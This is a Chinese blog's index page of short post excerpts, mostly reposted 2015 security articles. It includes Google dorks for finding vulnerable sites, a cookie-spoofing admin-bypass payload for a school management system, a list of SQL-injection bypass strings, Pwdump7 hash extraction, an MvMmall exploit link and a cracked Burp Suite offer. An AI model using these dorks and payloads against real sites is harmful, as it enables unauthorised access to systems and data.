- 博客(14)
- 收藏
- 关注
RSS订阅转载 使用Pwdump7提取系统密码hash值
首先,下载“Pwdump7.rar”这个文件,并将其解压到D盘根目录下。接着,打开“命令提示符”窗口并输入“PwDump7”命令,在按下回车键后即可看到如图所示的结果。图 命令执行结果这里的“PASSWORD”后面是一串星号,这表示当前帐户没有设置密码。当我们为Administrator帐户设置一个密码后,再次运行“PwDump7”命令时,就会得到如下内容:Ad
2015-04-20 19:18:15
19646
转载 网络安全相关站点
技术|资讯www.freebuf.com(内容质量不错)www.wuyun.org(drops和zone都不错)0day5.com(经常会发布一些较新的漏洞文章)xss.hacktask.net(XSS漏洞利用平台)security.tencent.com(腾讯安全应急响应中心)www.hack-cn.com(全球被黑网站站点统计)www
2015-04-18 21:24:13
690
转载 MvMmallv5.5SQL注入之php的exp利用讲解
漏洞类型:MvMmall v5.5.1SQL注入漏洞默认后台:admincp.php?module=index谷歌搜索:”Powered by MvMmall v5.5.1″一、利用方式:php exp利用1 安装php环境使用phpnow很简单就能安装了。2 利用exp攻击链接: http://pan.baidu.com/s/1eQgr9FO提取密码:
2015-04-05 21:00:59
891
转载 随缘学校管理系统cookie欺骗漏洞
该漏洞出来有些时候了,可是现在依然存在而且不少,可以直接cookie欺骗进入后台成功率高达百分之99关键字:inurl:szwyadmin/login.aspEXP代码:1javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascr
2015-04-05 15:24:51
2557
1
转载 IIS6.0解析漏洞
IIS解析漏洞式什么?在 Windows 2003 IIS 6.0 下有两个漏洞,微软一直没有给出补丁。 IIS解析漏洞1: 在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。
2015-04-05 15:24:08
668
转载 教你如何使用搜索引擎批量检测网站注入点
很多新手朋友在通过查看网站是否存在注入点,的时候往往会通过搜索引擎批量检测。可是在最近2年,已经无法通过百度批量查找网站是否存在注入漏洞了。例如:我们要搜索所有网站后缀存在common.asp?id=页面的时候就可以通过inurl:common.asp?id=进行批量检测那些存在有注入SQL漏洞。见下图:———————————————————————————————–
2015-04-05 14:50:59
6174
转载 burpsuite_pro_v1.5.18 破解版
Burp Suite是一个Web应用程序集成攻击平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信,这样设计的目的是为了促进和提高整个攻击的效率。平台中所有工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。 BurpSuite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。这些不同的burp工具通过
2015-04-03 20:57:38
1529
转载 网站渗透测试原理及详细过程
网站渗透测试原理及详细过程渗透测试(Penetration Testing)目录零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集 零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就
2015-03-31 20:26:19
1067
转载 ANDROID TEXTVIEW 设置字体颜色
用一下方法基本上可以解决大多数字体颜色设置问题,先发一篇,明天继续发一篇高级的,通过用户选择的方式,改变字体颜色。 关键字: android textview colorTextView的字体设置方法:1、直接通过配置文件设置2、在Activity类中进行设置 第一种方式很简单,用于静态或初始文字颜色的设置,方法如下: main.xml X
2015-03-26 19:10:03
468
转载 XAMPP无法启动MySql解决办法
18:31:29 [mysql] Error: MySQL shutdown unexpectedly.18:31:29 [mysql] This may be due to a blocked port, missing dependencies, 18:31:29 [mysql] improper privileges, a crash, or a shutdown by ano
2015-03-21 18:33:15
5185
1
转载 从零开始SQL注入之三
转载自:http://lightless.me/archives/zero-to-n-sqli-3.html0x00 废话我们上次讲解了如何识别数字型的SQL注入以及各种猥琐的方法,什么?没看到有猥琐的方法?自己去上节给出的链接中去看。不过这么多猥琐的方法肯定记不住的,关键还是要领悟内涵嘛!理解了自然能搞出各种猥琐的方法,今天我们就来看看字符型的注入点怎么识别吧。
2015-03-21 16:58:52
532
3
转载 SQL Injection的猥琐技巧
转载自:http://lightless.me/archives/SQL-Injection-weisuo-Skill.html' or1=1#'=0#'>-1#'1#1'99#'=0=1#'0#'=0=1=1=1=1=1#'=11#'1#1'99999#'!=2!=3!=4#'|0#'&0#'^0#'0#'>
2015-03-21 16:29:50
488
转载 从零开始SQL注入之二
转载自:http://lightless.me/archives/zero-to-n-sqli-2.html0x00 废话又是废话环节,今天我们就开始实战吧。当然这是不可能的,在开始之前我还要废话一些东西,不过离实战不远了。0x01 理解SQL注入怎么又是理解SQL注入,作者你是出来坑爹的吧!不要慌,上一次我们只是通俗的讲了什么是SQL注入,大家
2015-03-21 16:27:10
503
转载 从零开始SQL注入之一
文章转载自:http://lightless.me/archives/zero-to-n-sqli-1.html0x00 废话又是一个新坑,只是突然心血来潮的,如果写到一半就没了勿怪。一直想写这么一个系列,从零开始XXXX之类的。虽然网上已经有很多了,但还是想写个自己的吧。其中大部分都是我对SQL注入的理解,很多都不是正确的概念,所以各位看官就不要吐槽了,权当看
2015-03-21 15:52:38
814
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人